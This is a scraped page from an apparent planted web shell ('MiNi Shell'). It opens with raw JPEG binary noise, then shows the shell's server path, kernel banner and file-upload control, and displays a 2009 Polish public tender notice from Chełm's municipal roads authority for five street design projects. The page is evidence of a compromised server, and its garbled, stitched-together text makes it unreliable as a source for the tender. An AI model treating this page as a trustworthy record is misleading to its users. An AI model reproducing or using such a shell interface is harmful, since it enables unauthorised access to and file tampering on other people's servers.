JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090715/112415-N-2009.html

<p class="kh_header"><b>Chełm: Opracowanie dokumentacji projektowo-kosztorysowych na budowę elementów ulic na terenie miasta Chełm.</b><br>
<b>Numer ogłoszenia: 112415 - 2009; data zamieszczenia: 15.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Miejskich , ul. Chełmońskiego 1, 22-100 Chełm, woj. lubelskie, tel. 082 5633228, faks 082 5633839.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdm-chelm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Miejska jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo-kosztorysowych na budowę elementów ulic na terenie miasta Chełm..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowych na budowę elementów ulic na terenie miasta Chełm.

Przedmiot zamówienia podlega podziałowi na zadania:

zadanie nr 1: opracowanie dokumentacji projektowo-kosztorysowej na budowę chodnika przy ulicy  H. Wiercieńskiego w Chełmie;

zadanie nr 2: opracowanie dokumentacji projektowo-kosztorysowej na budowę chodnika od ulicy Ceramicznej do SP ZOZ w Chełmie;

zadanie nr 3: opracowanie dokumentacji projektowo-kosztorysowej na budowę wjazdu i miejsc parkingowych wraz z zabezpieczeniem skarpy przy ulicy S. Czarnieckiego w Chełmie;

zadanie nr 4: opracowanie dokumentacji projektowo-kosztorysowej na budowę ciągu pieszego od ulicy Połanieckiej do Parku XXX-lecia w Chełmie;

Zadanie nr 5: opracowanie dokumentacji projektowo-kosztorysowej na budowę kanalizacji deszczowej wraz z odbudową nawierzchni ulicy Jedność w Chełmie.
	
2.	Zakres rzeczowy zamówienia - zarówno dla zadania nr 1, zadania nr 2, zadania nr 3, zadania nr 4 jak i dla zadania nr 5  obejmuje:

1)	opracowanie pełnobranżowego projektu budowlano-wykonawczego  -  w 7 egz., w tym jeden w wersji elektronicznej,
2)	wykonanie przedmiaru robót - w 3 egz., w tym jeden w wersji elektronicznej,
3)	wykonanie kosztorysu inwestorskiego - w 3 egz., w tym jeden w wersji  elektronicznej,
4)	opracowanie specyfikacji technicznych wykonania i odbioru robót objętych zakresem zamówienia - w 3 egz., w tym jeden w wersji elektronicznej,
5)	uzyskanie i poniesienie kosztów uzyskania wszelkich niezbędnych do projektowania danych wyjściowych, materiałów, map, warunków technicznych, uzgodnień i decyzji, a w szczególności uzyskanie:
a)	decyzji o środowiskowych uwarunkowaniach zgody na realizacje przedsięwzięcia i sporządzenie raportu oddziaływania przedsięwzięcia na środowisko (jeśli wymagane) wraz z wykonaniem niezbędnych aktualnych badań i pomiarów (w oparciu o zapisy Ustawy z 3 października 2008 r. o dostępie do informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2008 r. nr 199, poz. 1227),
b)	decyzji o pozwoleniu na budowę.

3.	Zarówno w przypadku zadania nr 1, zadania nr 2, zadania nr 3, zadania nr 4 jak i zadania nr 5 do obowiązków Wykonawcy należy:

1)	Przygotowanie w imieniu Zamawiającego wniosku oraz załączników do wniosku o uzyskanie decyzji o pozwoleniu na budowę, uzyskanie i poniesienie kosztów uzyskania wszelkich niezbędnych uzgodnień, opinii i analiz.
2)	Dołączenie do protokołu przekazania dokumentacji oświadczenia, że przedmiot zamówienia został wykonany w stanie kompletnym z punktu widzenia celu, jakiemu ma służyć, zgodnie z umową oraz obowiązującymi przepisami,
3)	Przygotowanie dokumentacji projektowo-kosztorysowej w wersji elektronicznej, w formacie ogólnodostępnym (preferowanym formatem jest *pdf ),
4)	Przekazanie Zamawiającemu opracowania stanowiącego przedmiot zamówienia wraz z majątkowymi prawami autorskimi do tych opracowań,
5)	Dokonanie jednej bezpłatnej aktualizacji kosztorysów inwestorskich w terminie do 2 lat od uzyskania pozwolenia na budowę inwestycji opisanych jako zadanie nr 1, zadanie nr 2, zadanie nr 3, zadanie nr 4 oraz zadanie nr 5
6)	Podjęcie czynności nadzoru autorskiego nad realizowaną inwestycją opisaną jako zadanie nr 1, zadanie nr 2, zadanie nr 3, zadanie nr 4 oraz zadanie nr 5 na wezwanie Zamawiającego. Koszt pełnienia nadzoru autorskiego rozliczony zostanie odrębną umową, zgodnie ze stawką za umowną jednostkę nakładu pracy dla wycen dokonywanych na podstawie Środowiskowych Zasad Wyceny Prac Projektowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. 	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w przypadku zadania nr 1, zadania nr 2, zadania nr 3, zadania nr 4 jak i zadania nr 5:

1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności objętych przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a w szczególności:

a)	dysponują lub będą dysponować:
-  co najmniej jedną osobą posiadającą niezbędne uprawnienia budowlane w specjalności drogowej bez ograniczeń, które uprawniają do projektowania, będącą członkiem właściwej izby samorządu zawodowego, w rozumieniu przepisów Prawa Budowlanego (w przypadku zadania nr 1, zadania nr 2, zadania nr 3 i zadania nr 4),  
-  co najmniej jedną osobą posiadającą niezbędne uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, które uprawniają do projektowania lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie wystarczającym do projektowania sieci kanalizacyjnych, będącą członkiem właściwej izby samorządu zawodowego, w rozumieniu przepisów Prawa Budowlanego (w przypadku zadania nr 5)
b)	w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali:
- co najmniej jedną usługę polegającą na opracowaniu pełnobranżowej dokumentacji projektowo-kosztorysowej zawierającej opracowanie branży drogowej o wartości co najmniej 20 000 zł (w przypadku zadania nr 1),
- co najmniej jedną usługę polegającą na opracowaniu pełnobranżowej dokumentacji projektowo-kosztorysowej zawierającej opracowanie branży drogowej o wartości co najmniej 5 000 zł (w przypadku zadania nr 2, zadania nr 3, zadania nr 4), 
- co najmniej jedną usługę polegającą na opracowaniu pełnobranżowej dokumentacji projektowo-kosztorysowej zawierającej opracowanie branży sanitarnej o wartości co najmniej 20 000 zł (w przypadku zadania nr 5)
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2.	Wykonawcą może być osoba fizyczna, osoba prawna albo jednostka organizacyjna nieposiadająca osobowości prawnej, która będzie ubiegała się o udzielenie zamówienia publicznego, złoży ofertę lub zawrze umowę w sprawie zamówienia publicznego, jeżeli jego oferta zostanie wybrana.
3.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
	Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. 
	Warunki jakie muszą spełniać Wykonawcy wspólnie ubiegający się o udzielenie zamówienia przedstawia odpowiedni załącznik nr 2 do specyfikacji istotnych warunków zamówienia.

Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego będzie dokonana na podstawie treści wymaganych oświadczeń i dokumentów, o których mowa  w pkt. A. VI specyfikacji istotnych warunków zamówienia, według formuły  spełnia/nie spełnia  wymagany warunek..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W przypadku zadania nr 1, zadania nr 2,  zadania nr 3, zadania nr 4 oraz zadania nr 5 Wykonawca zobowiązany jest złożyć wraz z ofertą nw. oświadczenie i dokumenty:

1.	Oświadczenie potwierdzające spełnianie warunków udziału w postępowaniu, zgodne z wzorem druku stanowiącym załącznik nr 3 do specyfikacji istotnych warunków zamówienia - odpowiednio dla zadania nr 1, zadania nr 2, zadania nr 3, zadania nr 4 oraz zadania nr 5.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności  gospodarczej , jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji  działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności. 
Wykaz osób złożony przez Wykonawcę powinien zawierać informacje określone we wzorze druku stanowiącym załącznik nr 4 do SIWZ odpowiednio dla zadania nr 1, zadania nr 2, zadania nr 3, zadanie nr 4 oraz zadania nr 5.
Przedłożony wykaz powinien zawierać: 
a)	co najmniej jedną osobę posiadającą niezbędne  uprawnienia budowlane w specjalności drogowej bez ograniczeń, które uprawniają do projektowania, będącą członkiem właściwej izby samorządu zawodowego, w rozumieniu przepisów Prawa Budowlanego (w przypadku zadanie nr 1, zadanie nr 2, zadanie nr 3 oraz zadanie nr 4),
b)	co najmniej jedną osobę posiadającą niezbędne uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, które uprawniają do projektowania lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie wystarczającym do projektowania sieci kanalizacyjnych, będącą członkiem właściwej izby samorządu zawodowego, w rozumieniu przepisów Prawa Budowlanego (w przypadku zadania nr 5);
Do wykazu należy załączyć:
- dokument stwierdzający, że dana osoba, która będzie uczestniczyć w wykonywaniu zamówienia posiada wymagane uprawnienia,
- zaświadczenie z właściwej izby samorządu zawodowego, w rozumieniu przepisów Prawa Budowlanego potwierdzające członkostwo.
4.	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa w pkt. 3, Wykonawca wykazał osoby, którymi będzie dysponował.
5.	Wykaz  wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców.
Wykaz usług złożony przez Wykonawcę powinien zawierać informacje określone we wzorze druku stanowiącym załącznik nr 5 do SIWZ odpowiednio dla zadania nr 1, zadania nr 2, zadania nr 3, zadania nr 4 oraz zadania nr 5.
Wykonawca powinien wykazać i udokumentować wykonanie:
a)	co najmniej jednej usługi polegającej na opracowaniu pełnobranżowej dokumentacji projektowo-kosztorysowej zawierającej opracowanie branży drogowej o wartości co najmniej 20 000 zł (w przypadku zadania nr 1), 
b)	co najmniej jednej usługi polegającej na opracowaniu pełnobranżowej dokumentacji projektowo-kosztorysowej zawierającej opracowanie branży drogowej o wartości co najmniej 5 000 zł (w przypadku zadania nr 2, zadania nr 3 i zadania nr 4),
c)	co najmniej jednej usługi polegającej na opracowaniu pełnobranżowej dokumentacji projektowo-kosztorysowej zawierającej opracowanie branży sanitarnej o wartości co najmniej 20 000 zł (w przypadku zadania nr 5).
 Do każdej usługi umieszczonej w wykazie należy dołączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie (np. referencje, protokoły odbioru lub inne posiadane przez Wykonawcę dokumenty).  

Postanowienia §2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 z późn. zm.) stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdm-chelm.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich, 22 - 100 Chełm, ul. Chełmońskiego 1, pok. nr 16.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2009 godzina 09:30, miejsce: siedziba Zamawiającego (Zarząd Dróg Miejskich, 22 - 100 Chełm, ul. Chełmońskiego 1, pokój nr 20) lub za pośrednictwem poczty.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowo-kosztorysowej na budowę chodnika przy ulicy  H. Wiercieńskiego w Chełmie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:

1)	opracowanie pełnobranżowego projektu budowlano-wykonawczego  -  w 7 egz., w tym jeden w wersji elektronicznej,
2)	wykonanie przedmiaru robót - w 3 egz., w tym jeden w wersji elektronicznej,
3)	wykonanie kosztorysu inwestorskiego - w 3 egz., w tym jeden w wersji  elektronicznej,
4)	opracowanie specyfikacji technicznych wykonania i odbioru robót objętych zakresem zamówienia - w 3 egz., w tym jeden w wersji elektronicznej,
5)	uzyskanie i poniesienie kosztów uzyskania wszelkich niezbędnych do projektowania danych wyjściowych, materiałów, map, warunków technicznych, uzgodnień i decyzji, a w szczególności uzyskanie:
a)	decyzji o środowiskowych uwarunkowaniach zgody na realizacje przedsięwzięcia i sporządzenie raportu oddziaływania przedsięwzięcia na środowisko (jeśli wymagane) wraz z wykonaniem niezbędnych aktualnych badań i pomiarów (w oparciu o zapisy Ustawy z 3 października 2008 r. o dostępie do informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2008 r. nr 199, poz. 1227),
b)	decyzji o pozwoleniu na budowę..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowo-kosztorysowej na budowę chodnika od ulicy Ceramicznej do SP ZOZ w Chełmie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:

1)	opracowanie pełnobranżowego projektu budowlano-wykonawczego  -  w 7 egz., w tym jeden w wersji elektronicznej,
2)	wykonanie przedmiaru robót - w 3 egz., w tym jeden w wersji elektronicznej,
3)	wykonanie kosztorysu inwestorskiego - w 3 egz., w tym jeden w wersji  elektronicznej,
4)	opracowanie specyfikacji technicznych wykonania i odbioru robót objętych zakresem zamówienia - w 3 egz., w tym jeden w wersji elektronicznej,
5)	uzyskanie i poniesienie kosztów uzyskania wszelkich niezbędnych do projektowania danych wyjściowych, materiałów, map, warunków technicznych, uzgodnień i decyzji, a w szczególności uzyskanie:
c)	decyzji o środowiskowych uwarunkowaniach zgody na realizacje przedsięwzięcia i sporządzenie raportu oddziaływania przedsięwzięcia na środowisko (jeśli wymagane) wraz z wykonaniem niezbędnych aktualnych badań i pomiarów (w oparciu o zapisy Ustawy z 3 października 2008 r. o dostępie do informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2008 r. nr 199, poz. 1227),
d)	decyzji o pozwoleniu na budowę..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji projektowo-kosztorysowej na budowę wjazdu i miejsc parkingowych wraz z zabezpieczeniem skarpy przy ulicy S. Czarnieckiego w Chełmie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:

1)	opracowanie pełnobranżowego projektu budowlano-wykonawczego  -  w 7 egz., w tym jeden w wersji elektronicznej,
2)	wykonanie przedmiaru robót - w 3 egz., w tym jeden w wersji elektronicznej,
3)	wykonanie kosztorysu inwestorskiego - w 3 egz., w tym jeden w wersji  elektronicznej,
4)	opracowanie specyfikacji technicznych wykonania i odbioru robót objętych zakresem zamówienia - w 3 egz., w tym jeden w wersji elektronicznej,
5)	uzyskanie i poniesienie kosztów uzyskania wszelkich niezbędnych do projektowania danych wyjściowych, materiałów, map, warunków technicznych, uzgodnień i decyzji, a w szczególności uzyskanie:
a)	decyzji o środowiskowych uwarunkowaniach zgody na realizacje przedsięwzięcia i sporządzenie raportu oddziaływania przedsięwzięcia na środowisko (jeśli wymagane) wraz z wykonaniem niezbędnych aktualnych badań i pomiarów (w oparciu o zapisy Ustawy z 3 października 2008 r. o dostępie do informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2008 r. nr 199, poz. 1227),
b)	decyzji o pozwoleniu na budowę..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opracowanie dokumentacji projektowo-kosztorysowej na budowę ciągu pieszego od ulicy Połanieckiej do Parku XXX-lecia w Chełmie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:

1)	opracowanie pełnobranżowego projektu budowlano-wykonawczego  -  w 7 egz., w tym jeden w wersji elektronicznej,
2)	wykonanie przedmiaru robót - w 3 egz., w tym jeden w wersji elektronicznej,
3)	wykonanie kosztorysu inwestorskiego - w 3 egz., w tym jeden w wersji  elektronicznej,
4)	opracowanie specyfikacji technicznych wykonania i odbioru robót objętych zakresem zamówienia - w 3 egz., w tym jeden w wersji elektronicznej,
5)	uzyskanie i poniesienie kosztów uzyskania wszelkich niezbędnych do projektowania danych wyjściowych, materiałów, map, warunków technicznych, uzgodnień i decyzji, a w szczególności uzyskanie:
a)	decyzji o środowiskowych uwarunkowaniach zgody na realizacje przedsięwzięcia i sporządzenie raportu oddziaływania przedsięwzięcia na środowisko (jeśli wymagane) wraz z wykonaniem niezbędnych aktualnych badań i pomiarów (w oparciu o zapisy Ustawy z 3 października 2008 r. o dostępie do informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2008 r. nr 199, poz. 1227),
b)	decyzji o pozwoleniu na budowę..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opracowanie dokumentacji projektowo-kosztorysowej na budowę kanalizacji deszczowej wraz z odbudową nawierzchni ulicy Jedność w Chełmie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:

1)	opracowanie pełnobranżowego projektu budowlano-wykonawczego  -  w 7 egz., w tym jeden w wersji elektronicznej,
2)	wykonanie przedmiaru robót - w 3 egz., w tym jeden w wersji elektronicznej,
3)	wykonanie kosztorysu inwestorskiego - w 3 egz., w tym jeden w wersji  elektronicznej,
4)	opracowanie specyfikacji technicznych wykonania i odbioru robót objętych zakresem zamówienia - w 3 egz., w tym jeden w wersji elektronicznej,
5)	uzyskanie i poniesienie kosztów uzyskania wszelkich niezbędnych do projektowania danych wyjściowych, materiałów, map, warunków technicznych, uzgodnień i decyzji, a w szczególności uzyskanie:
a)	decyzji o środowiskowych uwarunkowaniach zgody na realizacje przedsięwzięcia i sporządzenie raportu oddziaływania przedsięwzięcia na środowisko (jeśli wymagane) wraz z wykonaniem niezbędnych aktualnych badań i pomiarów (w oparciu o zapisy Ustawy z 3 października 2008 r. o dostępie do informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2008 r. nr 199, poz. 1227),
b)	decyzji o pozwoleniu na budowę..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com